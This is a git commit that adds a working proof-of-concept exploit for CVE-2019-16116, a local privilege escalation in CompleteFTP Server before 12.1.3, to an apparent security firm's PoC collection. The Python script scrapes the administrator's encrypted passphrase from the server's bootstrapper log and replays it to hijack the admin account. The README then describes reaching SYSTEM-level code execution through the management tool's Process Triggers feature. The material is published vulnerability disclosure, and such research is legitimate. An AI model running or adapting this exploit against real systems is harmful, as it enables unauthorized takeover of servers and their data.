add CVE-2019-16116

CVE-2019-16116/CVE-2019-16116.py

@@ -0,0 +1,25 @@
+##############################################################################################################################
+##                                                                                                                          ##
+##      PoC exploit for CVE-2019-16116                                                                                      ##
+##      Researcher: Robert Fisher (Twitter: @be0vlk)                                                                        ##
+##      Blog Post: https://rhinosecuritylabs.com/application-security/completeftp-server-local-privesc-cve-2019-16116/      ##  
+##                                                                                                                          ##
+##############################################################################################################################
+
+import subprocess
+
+log_file = r"C:\Program Files (x86)\Complete FTP\Server\Bootstrapper.log"
+admin_secret_line = r"INFO ConfigBuilder Launching"
+manager_exe = r"C:\Program Files (x86)\Complete FTP\Manager\CompleteFTPManager.exe"
+
+try:
+    with open(log_file, "r") as bootstrap:
+        for line in bootstrap.readlines():
+            if admin_secret_line in line:
+                line = line.split("Launching", 1)[-1].lstrip()
+                subprocess.run(r"{}".format(line))
+        print("\n[+] Admin account hijacked! Opening management tool...")
+        subprocess.run(r"{}".format(manager_exe))
+except FileNotFoundError:
+    print("\n[!] Files not found. Verify the program directory.")
+

CVE-2019-16116/README.md

@@ -0,0 +1,18 @@
+# CVE‑2019‑16116: CompleteFTP Server Local Privilege Escalation 
+
+## Information
+**Description:** This vulnerability allows hijacking the CompleteFTP administrator account which then leads to code execution with "SYSTEM" privileges. CompleteFTP Server versions prior to 12.1.3 are vulnerable to this attack.
+<br/>**Versions Affected:** < 12.1.3
+<br/>**Researcher:** Robert Fisher (https://twitter.com/be0vlk @be0vlk) 
+<br/>**Disclosure Link:** https://rhinosecuritylabs.com/application-security/completeftp-server-local-privesc-cve-2019-16116/
+<br/>**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2019-16116
+<br/>**Vendor Disclosure:** https://enterprisedt.com/products/completeftp/doc/guide/html/history.html  
+
+## Proof-of-Concept Exploit
+### Description
+The attacker needs read access to the server install directory, which is default. The exploit obtains the administrator encrypted passphrase from the log file and uses it to login to the management interface as the administrator. To escalate the attack, you will need to navigate to the "Process Triggers" section of the interface where you will be able to input your arbitrary code to be executed as "SYSTEM".
+
+### Usage/Exploitation
+Run the exploit from a standard user account on Windows where CompleteFTP Server is installed.  
+
+![PoC](https://github.com/RhinoSecurityLabs/CVE-Private/blob/master/CVE-2019-16116/poc.png?raw=true "PoC Exploit")

README.md

@@ -1,6 +1,7 @@
 # Rhino CVE Proof-of-Concept Exploits
 A collection of proof-of-concept exploit scripts written by the team at Rhino Security Labs for various CVEs.
 
+* [CVE-2019-16116: CompleteFTP Server Local Privilege Escalation](CVE-2019-16116/)
 * [CVE-2019-5678: Command Injection in Nvidia GeForce Experience Web Helper](CVE-2019-5678/)
 * [CVE-2019-5674: Arbitrary File Overwrite in Nvidia GeForce Experience](CVE‑2019‑5674/)
 * [CVE-2019-0227: Apache Axis Remote Code Execution](CVE-2019-0227/)